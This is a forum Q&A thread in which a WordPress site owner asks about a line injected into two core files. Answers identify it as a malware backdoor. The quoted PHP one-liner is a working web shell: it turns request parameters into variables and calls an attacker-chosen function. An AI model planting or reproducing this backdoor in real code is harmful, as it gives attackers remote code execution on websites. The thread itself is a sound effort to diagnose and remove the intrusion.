Question 2744 in Wordpress Question posted in
The official Wordpress documentation can be found here.

PHP/WordPress: our site broke with the following code in the files

Any help is very appreciated.

Short story:

I would like some help trying to understand what this line of code is intended to do.

extract($_REQUEST)&&@$shall(stripslashes($shall))&&exit;

I deciphered most of it except the $shall part. $shall does not appear anywhere else and I did not go into details of reading WordPress code.

The line appeared in the below files as the first line right after <?php

Long story:

I have a site that runs on WordPress and it randomly broke with errors in 2 WordPress files. The filenames are

…/wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php

…/wp-includes/blocks/block.php

It is not present in WordPress GitLab file versions. We did not initiate any WordPress updates, etc. I commented out the line in both files and all is back to normal.

Any ideas as to how/why/for what purpose this line would appear there?

Tags:

2

Answers


  1. 0

    If ($_REQUEST['shall']="something") then $shall will equal string 'something' after the extract part. If there’s a function called something it will execute. So basically all wordpress functions are available for this script. This is a back door for a malware no doubt. Not good.

    Search in google found record of the file name somewhere, however before you remove it be ready for it to re-appear if you haven’t fixed your vulnerabilities.

    Login or Signup to reply.
  2. 0

    This is a malware and remove the code part from the file. Then it works for me

    Login or Signup to reply.
Please signup or login to give your own answer.

Back To Top
Search